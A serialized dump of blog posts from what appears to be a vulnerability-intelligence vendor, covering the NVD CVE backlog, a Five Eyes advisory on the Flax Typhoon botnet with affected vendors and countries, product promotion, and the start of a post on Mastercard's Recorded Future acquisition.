developments.",[18,65303,65304],{},"CVE-2024-9441 is a stark reminder that even niche devices can be high-value targets for botnets like Flax Typhoon. While the pool of vulnerable devices may be shrinking, the emergence of new vulnerabilities means threats continue to persist. We’ll continue to monitor the situation closely, but for now, taking proactive steps is the best defense against this unpatched vulnerability.",[61,65306,202],{"id":201},[18,65308,63449,65309,982,65312,65315,65316,982,65319,63288],{},[47,65310,40447],{"href":53829,"rel":65311},[51],[47,65313,55229],{"href":53837,"rel":65314},[51],". Sign up to start a trial of our ",[47,65317,1245],{"href":45535,"rel":65318},[51],[47,65320,216],{"href":214,"rel":65321},[51],{"title":219,"searchDepth":220,"depth":220,"links":65323},[65324,65325,65326,65327,65328,65329,65330],{"id":65207,"depth":220,"text":65208},{"id":65220,"depth":220,"text":65221},{"id":65235,"depth":220,"text":65236},{"id":65255,"depth":220,"text":65256},{"id":65271,"depth":220,"text":65272},{"id":63432,"depth":220,"text":63433},{"id":201,"depth":220,"text":202},"2024-10-08","A newly disclosed vulnerability, CVE-2024-9441, affects the Linear Emerge E3 series. The vulnerability has not yet been patched by the vendor, and exploits are already circulating, raising concerns of imminent exploitation.",{"slug":65334},"flax-typhoon-linear-merge","\u002Fblog\u002Fflax-typhoon-linear-merge",{"title":65169,"description":65332},"blog\u002Fflax-typhoon-linear-merge",[1279],"Q8o88Of8j9_Q1GXix_bLlbbhh4SsnY9oQlE-0nqd7RM",{"id":65341,"title":65342,"articles":65343,"authors":65374,"body":65376,"date":65123,"description":65656,"extension":234,"image":7,"link":7,"meta":65657,"navigation":237,"path":65659,"seo":65660,"series":7,"stem":65661,"subtype":7,"tags":65662,"__hash__":65663},"blog\u002Fblog\u002Fnvd-backlog-exploitation-lurking.md","Danger is Still Lurking in the NVD Backlog",[65344,65348,65351,65354,65357,65360,65363,65368,65371],{"title":65345,"source":3508,"link":65346,"date":65347},"Resilient Cyber Newsletter #16","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fresilient-cyber-newsletter-16","2024-10-01",{"title":65349,"source":43755,"link":65350,"date":62592},"It’s September 30. Do you know where your CVE backlog is?","https:\u002F\u002Fenergycentral.com\u002Fc\u002Fiu\u002Fit%E2%80%99s-september-30-do-you-know-where-your-cve-backlog",{"title":65352,"source":61436,"link":65353,"date":62592},"Risky Biz News: New EvilCorp sanctions and LockBit arrests drop on Counter Ransomware Initiative summit week","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-new-evilcorp-sanctions-and-lockbit-arrests-drop-on-counter-ransomware-initiative-summit-week\u002F",{"title":65355,"source":3481,"link":65356,"date":62592},"NIST's security flaw database still backlogged with 17K+ unprocessed bugs. Not great","https:\u002F\u002Fwww.theregister.com\u002F2024\u002F10\u002F02\u002Fcve_pileup_nvd_missed_deadline\u002F",{"title":65358,"source":14378,"link":65359,"date":62659},"In Other News: Doxing With Meta Ray-Ban Glasses, OT Hunting, NVD Backlog","https:\u002F\u002Fwww.securityweek.com\u002Fin-other-news-doxing-with-meta-ray-ban-glasses-ot-hunting-nvd-backlog\u002F",{"title":65361,"source":14382,"link":65362,"date":62682},"THN Cybersecurity Recap: Top Threads and Trends (Sept 30 - Oct 6)","https:\u002F\u002Fthehackernews.com\u002F2024\u002F10\u002Fthn-cybersecurity-recap-top-threats-and.html",{"title":65364,"source":65365,"link":65366,"date":65367},"NIST says exploited vulnerability backlog cleared but end-of-year goal for full list unlikely","The Record","https:\u002F\u002Ftherecord.media\u002Fnist-vulnerability-backlog-cleared-cisa","2024-11-13",{"title":65369,"source":23286,"link":65370,"date":62469},"NIST Clears Backlog of Known Security Flaws but Not All Vulnerabilities","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F11\u002Fnist-clears-backlog-of-known-security-flaws-but-not-all-vulnerabilities\u002F",{"title":65372,"source":14378,"link":65373,"date":62469},"NIST Explains Why It Failed to Clear CVE Backlog","https:\u002F\u002Fwww.securityweek.com\u002Fnist-explains-why-it-failed-to-clear-cve-backlog\u002F",[65375],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":65377,"toc":65647},[65378,65384,65387,65396,65405,65408,65411,65414,65416,65427,65431,65434,65439,65443,65446,65452,65457,65461,65464,65470,65473,65608,65612,65615,65623,65627,65633,65636,65638,65640,65642],[18,65379,65380],{},[68,65381],{":width":10862,"alt":65382,"src":65383},"NIST NVD CVE Status","\u002Fblog\u002Fnvd-backlog-exploitation-lurking\u002Fnist-nvd-status.png",[18,65385,65386],{},"On February 12, 2024, the NVD began slowing its processing and enrichment of new vulnerabilities, resulting in a backlog of over 18,000 vulnerabilities.",[18,65388,65389,65390,65395],{},"On May 23, we wrote about ",[47,65391,65394],{"href":65392,"rel":65393},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fnvd-backlog-exploitation",[51],"The Real Danger Lurking in the NVD Backlog",". It showed that 93.4% of new vulnerabilities had not been analyzed by the National Vulnerability Database (NVD) between February 12 and May 19, 2024.",[18,65397,65398,65399,65404],{},"On May 29, NIST announced that it awarded a contract to a third-party, Maryland-based Analygence, to help address the backlog. Its ",[47,65400,65403],{"href":65401,"rel":65402},"https:\u002F\u002Fwww.nist.gov\u002Fitl\u002Fnvd",[51],"announcement"," expressed confidence that “this additional support will allow us to return to the processing rates prior to February 2024 within the next few months.” It further stated that it expects the “backlog to be cleared by the end of the fiscal year.”",[18,65406,65407],{},"That self-imposed deadline is September 30 so we thought it would be worthwhile to revisit our research to see how it’s doing against those goals.",[18,65409,65410],{},"We found a very mixed story.",[18,65412,65413],{},"As the chart above shows, since the May 29 announcement, the NIST National Vulnerability Database (NVD) has made considerable progress in processing new vulnerabilities, but a significant backlog remains.\nIn this update, we aim to provide the security community with insights into the current state of that progress, using data sourced from both the NVD and VulnCheck’s exploit and vulnerability services. Our analysis focuses on CVEs published by the NVD between February 12 and September 21, 2024.",[61,65415,43093],{"id":43092},[22,65417,65418,65421,65424],{},[25,65419,65420],{},"As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed (compared to 93.4% as of May 19, 2024).",[25,65422,65423],{},"As of September 21st, 46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024).\nOf the 197 KEVs, 92 have yet to be assessed by the NVD (Source: VulnCheck KEV).\nA* s of September 21, 2024, 85.9% of CVEs added to the NVD since February 12 now have a CVSS record, leaving only 14.1% without a CVSS score.",[25,65425,65426],{},"VulnCheck believes that NVD’s embrace of CISA’s Vulnrichment as a data provider for CVSS enrichment has been a notable success.",[61,65428,65430],{"id":65429},"nvd-current-processing-status-of-cves-since-february-12-2024","NVD Current Processing Status of CVEs Since February 12, 2024",[18,65432,65433],{},"Although our outlook for the NVD was bleak in May, when 93.4% of vulnerabilities remained unanalyzed, there has been significant progress. Of the 25,357 new vulnerabilities added to the database since February 12, 72.4% (categorized as Awaiting Analysis, Received, or Undergoing Analysis) have yet to be fully analyzed. While a substantial backlog remains, it appears the NVD might now have the capacity to keep up with enriching new CVEs as they are issued. It will be interesting how and when they address the backlog.",[18,65435,65436],{},[68,65437],{":width":10862,"alt":65382,"src":65438},"\u002Fblog\u002Fnvd-backlog-exploitation-lurking\u002Fnist-nvd-vuln-status.png",[61,65440,65442],{"id":65441},"unaddressed-known-exploited-cves","Unaddressed Known Exploited CVEs",[18,65444,65445],{},"As of September 20th, 46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD. Of the 197 KEVs, 92 have yet to be assessed by the NVD (Source: VulnCheck KEV). In our earlier research from May, we found 50.8% (30 out of 59) of KEVs were also unanalyzed by the NVD. Many of these unanalyzed vulnerabilities that have gone unanalyzed impact key technologies such as Adobe, Arcserve, Apache, Cisco, Microsoft, Progress, VMware, Zyxel, and others.",[18,65447,2245,65448,65451],{},[47,65449,45222],{"href":2871,"rel":65450},[51]," catalog is a real-time resource that tracks known exploited vulnerabilities, including those from the CISA KEV list. It is available as a free community resource with publicly referenceable citations.",[18,65453,65454],{},[68,65455],{":width":10862,"alt":65382,"src":65456},"\u002Fblog\u002Fnvd-backlog-exploitation-lurking\u002Fnist-nvd-exploited.png",[61,65458,65460],{"id":65459},"common-vulnerability-scoring-system-coverage","Common Vulnerability Scoring System Coverage",[18,65462,65463],{},"While the NVD has faced challenges in processing new vulnerabilities, CVE Numbering Authorities (CNAs) and CISA Vulnrichment have worked hard to enrich CVE records directly with CPE, CVSS, CWE and SSVC. While NVD has not incorporated all data from Vulnrichment, I’ve decided to highlight the impact of their incorporation of CVSS from Vulnrichment in addition to the CVSS scores submitted by CVE Numbering Authorities (CNA’s). To assess this progress, I analyzed CVSS coverage within the NIST NVD across primary and secondary sources. As of September 21, 2024, 85.9% of CVEs added since February 12 now have a CVSS record, leaving only 14.1% of CVEs without a CVSS score.",[18,65465,65466],{},[68,65467],{":width":10862,"alt":65468,"src":65469},"NIST NVD CVSS Scores","\u002Fblog\u002Fnvd-backlog-exploitation-lurking\u002Fnist-nvd-cvss.png",[18,65471,65472],{},"To understand which CNAs have the most outstanding CVEs without a CVSS score, I compiled the following table. Two CNAs stand out: Linux, which has overwhelmed the CVE program with a high volume of vulnerabilities this year, and Mitre, the Root CNA responsible for managing the CVE program.",[307,65474,65475,65485],{},[310,65476,65477],{},[313,65478,65479,65482],{},[316,65480,65481],{},"CVE Numbering Authority (CNA)",[316,65483,65484],{},"CVE Count w\u002Fo CVSS Score",[336,65486,65487,65494,65502,65509,65517,65525,65532,65538,65545,65553,65560,65568,65574,65580,65587,65594,65601],{},[313,65488,65489,65491],{},[341,65490,54082],{},[341,65492,65493],{},"2172",[313,65495,65496,65499],{},[341,65497,65498],{},"Mitre",[341,65500,65501],{},"632",[313,65503,65504,65506],{},[341,65505,33109],{},[341,65507,65508],{},"139",[313,65510,65511,65514],{},[341,65512,65513],{},"WPscan",[341,65515,65516],{},"135",[313,65518,65519,65522],{},[341,65520,65521],{},"JPCert",[341,65523,65524],{},"51",[313,65526,65527,65529],{},[341,65528,3149],{},[341,65530,65531],{},"46",[313,65533,65534,65536],{},[341,65535,3069],{},[341,65537,3650],{},[313,65539,65540,65543],{},[341,65541,65542],{},"Huawei",[341,65544,36899],{},[313,65546,65547,65550],{},[341,65548,65549],{},"Google",[341,65551,65552],{},"37",[313,65554,65555,65558],{},[341,65556,65557],{},"Mediatek",[341,65559,3599],{},[313,65561,65562,65565],{},[341,65563,65564],{},"Android",[341,65566,65567],{},"27",[313,65569,65570,65572],{},[341,65571,54076],{},[341,65573,39259],{},[313,65575,65576,65578],{},[341,65577,3105],{},[341,65579,39254],{},[313,65581,65582,65585],{},[341,65583,65584],{},"Unisoc",[341,65586,39234],{},[313,65588,65589,65592],{},[341,65590,65591],{},"Devolutions",[341,65593,39234],{},[313,65595,65596,65599],{},[341,65597,65598],{},"HP Security",[341,65600,37766],{},[313,65602,65603,65606],{},[341,65604,65605],{},"Joomla",[341,65607,24698],{},[61,65609,65611],{"id":65610},"notable-improvements-made-by-cve-cnas-and-cisa-enrichment","Notable Improvements Made by CVE, CNAs and CISA Enrichment",[18,65613,65614],{},"In the article The Real Danger Lurking in the NVD Backlog, we highlighted several improvements that could have a significant impact, including CNAs submitting more complete data, the NVD focusing on automating CVE enrichment, and CISA’s Vulnrichment project becoming an Authorized Data Provider. We are pleased to see these improvements taking shape, and the NVD’s embrace of Vulnrichment as a data provider for CVSS enrichment has been a notable success. It will be interesting to see if NVD follows CISA’s path and becomes an Authorized Data Provider of the CVE Program.",[18,65616,65617,65618],{},"Another positive outcome of CISA’s Vulnrichment work is the integration of Stake-holder Specific Vulnerability Categorization(SSVC) decision nodes, now available in the CISA ADP section of the CVE List. Ben Edwards wrote an insightful article exploring this new source of prioritization information: ",[47,65619,65622],{"href":65620,"rel":65621},"https:\u002F\u002Fwww.bitsight.com\u002Fblog\u002Fdo-we-need-yet-another-vulnerability-scoring-system-ssvc-thats-yass",[51],"Do We Need Yet Another Vulnerability Scoring System? For SSVC, That's a YASS!",[61,65624,65626],{"id":65625},"vulnchecks-commitment-to-helping-fill-the-nvd-gap","VulnCheck's Commitment to Helping Fill the NVD Gap",[18,65628,65629,65630,59],{},"Regardless of the uncertainty, VulnCheck is committed to contributing back to the security community. VulnCheck is providing vulnerability enrichment services, including CPE and access to NIST-NVD from a single source at no cost. Anyone can register for the free service here: ",[47,65631,40745],{"href":40745,"rel":65632},[51],[18,65634,65635],{},"VulnCheck also provides a commercial service with broad access to vulnerability and exploit intelligence,including: Vulnerabilities in Open Source packages \u002F dependencies, Vulnerabilities in ICS\u002FOT, IoMT, IoT, mobile, etc., devices, Git repositories for new exploit PoCs, Caching of exploit PoCs, Exploit Maturity classification, Exploit Type classification, Evidence of exploitation in-the-wild & exploitation timelines and more.",[61,65637,202],{"id":201},[18,65639,205],{},[18,65641,208],{},[18,65643,211,65644,217],{},[47,65645,216],{"href":214,"rel":65646},[51],{"title":219,"searchDepth":220,"depth":220,"links":65648},[65649,65650,65651,65652,65653,65654,65655],{"id":43092,"depth":220,"text":43093},{"id":65429,"depth":220,"text":65430},{"id":65441,"depth":220,"text":65442},{"id":65459,"depth":220,"text":65460},{"id":65610,"depth":220,"text":65611},{"id":65625,"depth":220,"text":65626},{"id":201,"depth":220,"text":202},"A look into the real dangers of exploitation still lurking in the NVD Backlog",{"slug":65658},"nvd-backlog-exploitation-lurking","\u002Fblog\u002Fnvd-backlog-exploitation-lurking",{"title":65342,"description":65656},"blog\u002Fnvd-backlog-exploitation-lurking",[33173],"v-AdhcOF01NS0PWSkuCQjU1g4Ch4WiNk1eNWVtzNwdg",{"id":65665,"title":65666,"articles":65667,"authors":65685,"body":65687,"date":65671,"description":66087,"extension":234,"image":7,"link":7,"meta":66088,"navigation":237,"path":66090,"seo":66091,"series":7,"stem":66092,"subtype":7,"tags":66093,"__hash__":66094},"blog\u002Fblog\u002Fflax-typhoon-botnet.md","Exploring Targeted Technologies and Countries of the Flax Typhoon Botnet",[65668,65672,65676,65680,65683],{"title":65669,"source":14386,"link":65670,"date":65671},"Flax Typhoon’s Botnet Actively Exploiting 66 Vulnerabilities In Various Devices","https:\u002F\u002Fcybersecuritynews.com\u002Fflax-typhoons-botnet-66-vulnerabilities\u002F","2024-09-23",{"title":65673,"source":10841,"link":65674,"date":65675},"Less than half the vulnerabilities targeted by Flax Typhoon botnet listed in CISA catalog","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fvulnerabilities-flax-typhoon-botnet\u002F727886\u002F","2024-09-24",{"title":65677,"source":65678,"link":65679,"date":65675},"Bluetooth Mayhem: Firewalls Fail & Insulin Pumps Panic","Storm⚡️Watch","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=YEYO8R-ydBY",{"title":65681,"source":61436,"link":65682,"date":65010},"Risky Biz News: China says Taiwan's military is behind a hacktivist group","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-china-says-taiwans-military-is-behind-a-hacktivist-group\u002F",{"title":65669,"source":25672,"link":65684,"date":65055},"https:\u002F\u002Fgbhackers.com\u002Fflax-typhoon-botnet-66-exploits\u002F",[65686],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":65688,"toc":66078},[65689,65697,65700,65704,65718,65722,65727,65730,65771,65774,65778,65783,65786,66006,66010,66015,66018,66021,66025,66028,66051,66055,66060,66067,66069,66071,66073],[18,65690,65691,65692,65696],{},"Last week, Five Eyes agencies issued a Joint Cybersecurity Advisory titled, ",[47,65693,65695],{"href":37484,"rel":65694},[51],"“People’s Republic of China-Linked Actors Compromise Routers and IoT Devices for Botnet Operations”",". The report was authored across multiple agencies including the FBI, US Cyber Command, NSA, Australian Signals Directorate, ACSC, NCSC of New Zealand, Canada, and NCSC UK.",[18,65698,65699],{},"The advisory, issued by Five Eyes agencies’, introduces new intelligence, including indicators of compromise, exploited CVEs, and the geographical location of impacted devices. Below, we highlight key details from the report to help raise awareness about this Flax Typhoon botnet.",[61,65701,65703],{"id":65702},"key-takeaways-from-the-joint-cybersecurity-advisory","Key Takeaways from the Joint Cybersecurity Advisory",[22,65705,65706,65709,65712,65715],{},[25,65707,65708],{},"66 vulnerabilities are actively being exploited by Flax Typhoon's Botnet",[25,65710,65711],{},"The Flax Typhoon Botnet primarily targets routers, IoT devices, and other web-facing applications.",[25,65713,65714],{},"47.9% of devices associated with the Flax Typhoon Botnet are located in the United States.",[25,65716,65717],{},"Prior to this advisory, VulnCheck KEV included 41 of the 66 CVEs and has since been updated to include all 66 vulnerabilities. At the time of publication, CISA KEV included 27 of the 66 CVEs.",[61,65719,65721],{"id":65720},"technologies-targeted-by-flax-typhoon-botnet","Technologies Targeted by Flax Typhoon Botnet",[18,65723,65724],{},[68,65725],{":width":10862,"alt":62506,"src":65726},"\u002Fblog\u002Fflax-typhoon-botnet\u002Fflax-typhoon-botnet-tech.png",[18,65728,65729],{},"The joint advisory lists 66 vulnerabilities actively exploited to target routers, IoT devices and other web facing applications. The most affected software suppliers associated with the botnet include:",[22,65731,65732,65735,65738,65741,65744,65747,65750,65753,65756,65759,65762,65765,65768],{},[25,65733,65734],{},"Apache (10 CVEs)",[25,65736,65737],{},"Cisco (5 CVEs)",[25,65739,65740],{},"Zyxel (3 CVEs)",[25,65742,65743],{},"QNAP (3 CVEs)",[25,65745,65746],{},"Fortinet (3 CVEs)",[25,65748,65749],{},"Draytek (3 CVEs)",[25,65751,65752],{},"WordPress (2 CVEs)",[25,65754,65755],{},"Telesquare (2 CVEs)",[25,65757,65758],{},"Ivanti (2 CVEs)",[25,65760,65761],{},"IBM (2 CVEs)",[25,65763,65764],{},"F5 (2 CVEs)",[25,65766,65767],{},"Contec (2 CVEs)",[25,65769,65770],{},"Chamilo (2 CVEs)",[18,65772,65773],{},"Odds are you have some of these technologies in your environment, making it crucial to address these vulnerabilities.",[61,65775,65777],{"id":65776},"countries-targeted-by-flax-typhoon-botnet","Countries Targeted by Flax Typhoon Botnet",[18,65779,65780],{},[68,65781],{":width":10862,"alt":62506,"src":65782},"\u002Fblog\u002Fflax-typhoon-botnet\u002Fflax-typhoon-botnet-country.png",[18,65784,65785],{},"Analysis of devices associated with the Flax Typhoon Botnet shows that 47.9% of the devices are located in the United States, indicating a likely focus and foothold on US critical infrastructure. Other notable targets include Vietnam (8% of devices) and Germany(7.2% of devices). It appears the botnet is largely targeting North American, European and Asian countries.",[307,65787,65788,65800],{},[310,65789,65790],{},[313,65791,65792,65794,65797],{},[316,65793,1464],{},[316,65795,65796],{},"Node Count",[316,65798,65799],{},"Percentage",[336,65801,65802,65812,65823,65834,65845,65856,65867,65878,65888,65899,65910,65921,65932,65943,65954,65965,65974,65985,65996],{},[313,65803,65804,65806,65809],{},[341,65805,1494],{},[341,65807,65808],{},"126,000",[341,65810,65811],{},"47.90%",[313,65813,65814,65817,65820],{},[341,65815,65816],{},"Vietnam",[341,65818,65819],{},"21,100",[341,65821,65822],{},"8.00%",[313,65824,65825,65828,65831],{},[341,65826,65827],{},"Germany",[341,65829,65830],{},"18,900",[341,65832,65833],{},"7.20%",[313,65835,65836,65839,65842],{},[341,65837,65838],{},"Romania",[341,65840,65841],{},"9,600",[341,65843,65844],{},"3.70%",[313,65846,65847,65850,65853],{},[341,65848,65849],{},"Hong Kong",[341,65851,65852],{},"9,400",[341,65854,65855],{},"3.60%",[313,65857,65858,65861,65864],{},[341,65859,65860],{},"Canada",[341,65862,65863],{},"9,200",[341,65865,65866],{},"3.50%",[313,65868,65869,65872,65875],{},[341,65870,65871],{},"South Africa",[341,65873,65874],{},"9,000",[341,65876,65877],{},"3.40%",[313,65879,65880,65882,65885],{},[341,65881,1480],{},[341,65883,65884],{},"8,500",[341,65886,65887],{},"3.20%",[313,65889,65890,65893,65896],{},[341,65891,65892],{},"India",[341,65894,65895],{},"5,800",[341,65897,65898],{},"2.20%",[313,65900,65901,65904,65907],{},[341,65902,65903],{},"France",[341,65905,65906],{},"5,600",[341,65908,65909],{},"2.10%",[313,65911,65912,65915,65918],{},[341,65913,65914],{},"Bangladesh",[341,65916,65917],{},"4,100",[341,65919,65920],{},"1.60%",[313,65922,65923,65926,65929],{},[341,65924,65925],{},"Italy",[341,65927,65928],{},"4,000",[341,65930,65931],{},"1.50%",[313,65933,65934,65937,65940],{},[341,65935,65936],{},"Lithuania",[341,65938,65939],{},"3,300",[341,65941,65942],{},"1.30%",[313,65944,65945,65948,65951],{},[341,65946,65947],{},"Albania",[341,65949,65950],{},"2,800",[341,65952,65953],{},"1.10%",[313,65955,65956,65959,65962],{},[341,65957,65958],{},"Netherlands",[341,65960,65961],{},"2,700",[341,65963,65964],{},"1.00%",[313,65966,65967,65969,65972],{},[341,65968,61571],{},[341,65970,65971],{},"2,600",[341,65973,65964],{},[313,65975,65976,65979,65982],{},[341,65977,65978],{},"Australia",[341,65980,65981],{},"2,400",[341,65983,65984],{},"0.90%",[313,65986,65987,65990,65993],{},[341,65988,65989],{},"Poland",[341,65991,65992],{},"2,100",[341,65994,65995],{},"0.80%",[313,65997,65998,66001,66004],{},[341,65999,66000],{},"Spain",[341,66002,66003],{},"2,000",[341,66005,65995],{},[61,66007,66009],{"id":66008},"vulnerabilities-targeted-by-flax-typhoon-botnet","Vulnerabilities Targeted by Flax Typhoon Botnet",[18,66011,66012],{},[68,66013],{":width":10862,"alt":62506,"src":66014},"\u002Fblog\u002Fflax-typhoon-botnet\u002Fflax-typhoon-botnet-evidence.png",[18,66016,66017],{},"The Flax Typhoon Botnet exploits 66 vulnerabilities. Of these, 41 were known to VulnCheck before the advisory was published and available in VulnCheck KEV, a free community resource. Interestingly, only 27 of these vulnerabilities are listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. VulnCheck has since updated its own KEV resource to include all 66 vulnerabilities, and we expect CISA is likely to follow suit in the coming days\u002Fweeks\u002Fmonths.",[18,66019,66020],{},"Prior to this advisory, VulnCheck already had strong coverage. Besides the 41 known exploited vulnerabilities, 6 additional vulnerabilities were known to be weaponized (71.2%). Of the remaining vulnerabilities, 11 have proof-of-concept (PoC) exploit code, while 8 had no available exploit evidence prior to this advisory (12.1%).",[61,66022,66024],{"id":66023},"recommended-mitigations-from-the-fbi","Recommended Mitigations from the FBI",[18,66026,66027],{},"The FBI recommends several actions to mitigate threats posed by botnets like Flax Typhoon. These actions apply both to preventing IoT devices from becoming part of a botnet and to defending networks from already active botnets:",[22,66029,66030,66033,66036,66039,66042,66045,66048],{},[25,66031,66032],{},"Disable unused services and ports",[25,66034,66035],{},"Implement network segmentation",[25,66037,66038],{},"Monitor for high network traffic volume",[25,66040,66041],{},"Apply patches and updates",[25,66043,66044],{},"Replace default passwords with strong passwords",[25,66046,66047],{},"Plan for device reboots",[25,66049,66050],{},"Replace end-of-life equipment",[61,66052,66054],{"id":66053},"taking-an-evidence-based-approach-to-vulnerability-prioritization","Taking an Evidence-Based Approach to Vulnerability Prioritization",[18,66056,66057],{},[68,66058],{":width":10862,"alt":62506,"src":66059},"\u002Fblog\u002Fflax-typhoon-botnet\u002Fevidence-based-prioritization.png",[18,66061,66062,66066],{},[47,66063,66065],{"href":54458,"rel":66064},[51],"Prioritizing vulnerabilities"," effectively requires a comprehensive approach that integrates exploit evidence, environmental context, and additional risk factors. By utilizing threat intelligence and vulnerability attributes, organizations can make informed decisions in prioritizing vulnerabilities and reducing an organization's overall risk. At VulnCheck, we provide the tools and intelligence necessary to navigate the complex landscape of vulnerability management. Our resources, such as the VulnCheck KEV and Exploit & Vulnerability Intelligence, empower security practitioners to prioritize and remediate vulnerabilities effectively.",[61,66068,202],{"id":201},[18,66070,205],{},[18,66072,208],{},[18,66074,211,66075,217],{},[47,66076,216],{"href":214,"rel":66077},[51],{"title":219,"searchDepth":220,"depth":220,"links":66079},[66080,66081,66082,66083,66084,66085,66086],{"id":65702,"depth":220,"text":65703},{"id":65720,"depth":220,"text":65721},{"id":65776,"depth":220,"text":65777},{"id":66008,"depth":220,"text":66009},{"id":66023,"depth":220,"text":66024},{"id":66053,"depth":220,"text":66054},{"id":201,"depth":220,"text":202},"Last week, Five Eyes agencies issued a Joint Cybersecurity Advisory titled, “People's Republic of China-Linked Actors Compromise Routers and IoT Devices for Botnet Operations” which we explore in this blog post.",{"slug":66089},"flax-typhoon-botnet","\u002Fblog\u002Fflax-typhoon-botnet",{"title":65666,"description":66087},"blog\u002Fflax-typhoon-botnet",[1279],"_BXlurZScs2DN1fRAPsgUbQ93Pw0WHDZHGLJsN_KNtY",{"id":66096,"title":66097,"articles":7,"authors":66098,"body":66100,"date":66190,"description":66191,"extension":234,"image":7,"link":7,"meta":66192,"navigation":237,"path":66194,"seo":66195,"series":7,"stem":66196,"subtype":7,"tags":66197,"__hash__":66198},"blog\u002Fblog\u002F5-ways-to-enhance-your-security-product.md","5 Ways to Enhance Your Security Product Offering with VulnCheck",[66099],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":66101,"toc":66187},[66102,66107,66111,66114,66121,66125,66128,66135,66139,66142,66148,66152,66155,66162,66166,66169,66176,66178,66180,66182],[18,66103,66104],{},[68,66105],{":width":10862,"alt":66097,"src":66106},"\u002Fblog\u002F5-ways-to-enhance-your-security-product\u002F5-ways.png",[1920,66108,66110],{"id":66109},"_1-help-customers-prioritize-vulnerabilities-with-real-time-intelligence","1. Help customers prioritize vulnerabilities with real-time intelligence",[18,66112,66113],{},"VulnCheck’s Exploit & Vulnerability Intelligence streamlines the process of correlating data across hundreds of sources. It tracks Known Exploited Vulnerabilities, threat actors, botnets, ransomware, exploits, weaponized vulnerabilities, exploit timelines, MITRE ATT&CK, CAPEC, and more.",[18,66115,66116],{},[47,66117,66120],{"href":66118,"rel":66119},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fexploit-and-vulnerability-intelligence\u002Fexploit-intelligence",[51],"Learn more about VulnCheck Exploit & Vulnerability Intelligence",[1920,66122,66124],{"id":66123},"_2-provide-visibility-into-vulnerable-products-with-vulncheck-generated-cpe","2. Provide visibility into vulnerable products with VulnCheck-generated CPE",[18,66126,66127],{},"VulnCheck quickly generates accurate Common Platform Enumeration (CPE) mappings, linking technology systems, software, and packages to their associated CVEs.",[18,66129,66130],{},[47,66131,66134],{"href":66132,"rel":66133},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fexploit-and-vulnerability-intelligence\u002Fcpe",[51],"Learn more about VulnCheck CPE",[1920,66136,66138],{"id":66137},"_3-expand-detection-capabilities-for-initial-access-exploitation-with-detection-artifacts","3. Expand detection capabilities for initial access exploitation with detection artifacts",[18,66140,66141],{},"According to Mandiant, initial access vulnerabilities were a leading cause of data breaches in 2022. VulnCheck’s Initial Access Intelligence offers timely detection artifacts, enabling organizations to respond rapidly to these emerging threats.",[18,66143,66144],{},[47,66145,66147],{"href":59857,"rel":66146},[51],"Learn more about VulnCheck Initial Access Intelligence",[1920,66149,66151],{"id":66150},"_4-broaden-visibility-into-open-source-vulnerabilities-with-the-largest-inventory-of-purls","4. Broaden visibility into open source vulnerabilities with the largest inventory of pURLs",[18,66153,66154],{},"VulnCheck monitors package dependencies across a wide array of programming languages and operating system package managers. For tracked packages, VulnCheck includes vulnerability, license, research attributes, and fix information when possible.",[18,66156,66157],{},[47,66158,66161],{"href":66159,"rel":66160},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fexploit-and-vulnerability-intelligence\u002Fpackage-manager-support",[51],"Learn more about VulnCheck package manager support",[1920,66163,66165],{"id":66164},"_5-identify-potentially-vulnerable-systems-that-may-be-targeted-by-initial-access-exploits","5. Identify potentially vulnerable systems that may be targeted by initial access exploits",[18,66167,66168],{},"VulnCheck IP Intelligence tracks potentially vulnerable systems and monitors command & control (C2) attacker infrastructure and honeypots, offering crucial insights into potential targets.",[18,66170,66171],{},[47,66172,66175],{"href":66173,"rel":66174},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fip-intelligence\u002Fintroduction",[51],"Learn more about VulnCheck IP Intelligence",[61,66177,202],{"id":201},[18,66179,205],{},[18,66181,208],{},[18,66183,211,66184,217],{},[47,66185,216],{"href":214,"rel":66186},[51],{"title":219,"searchDepth":220,"depth":220,"links":66188},[66189],{"id":201,"depth":220,"text":202},"2024-09-17","Discover 5 ways VulnCheck enhances your security product offering with real-time intelligence, detection capabilities, and expanded vulnerability visibility.",{"slug":66193},"5-ways-to-enhance-your-security-product","\u002Fblog\u002F5-ways-to-enhance-your-security-product",{"title":66097,"description":66191},"blog\u002F5-ways-to-enhance-your-security-product",[23275],"OVcJRT94uo6anCAFpMP7KhIgkNqthOyuvTN8PEJCnlY",{"id":66200,"title":66201,"articles":7,"authors":66202,"body":66204,"date":66381,"description":66382,"extension":234,"image":7,"link":7,"meta":66383,"navigation":237,"path":66385,"seo":66386,"series":7,"stem":66387,"subtype":7,"tags":7,"__hash__":66388},"blog\u002Fblog\u002Fmastercard-recorded-future-acquisition.md","Intelligence is the Most Important and Most Lucrative Asset in Cybersecurity",[66203],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":66205,"toc":66376},[66206,66220,66226,66234,66237,66248,66251,66255,66258,66261,66274,66288,66291,66294,66298,66306,66315,66318,66321,66324,66327,66330,66339,66342,66345,66349,66352,66355,66364,66367,66370,66373],[18,66207,66208,66213,66214,66219],{},[47,66209,66212],{"href":66210,"rel":66211},"https:\u002F\u002Fwww.mastercard.com\u002Fnews\u002Fpress\u002F2024\u002Fseptember\u002Fmastercard-invests-in-continued-defense-of-global-digital-economy-with-acquisition-of-recorded-future\u002F",[51],"Recorded Future was acquired by Mastercard yesterday for $2.65B",", which is an encouraging macro indicator for the threat intelligence market and adjacent markets. Mastercard has plucked off acquisition targets in the broader cyber space in a pragmatic way to maintain competitive advantage 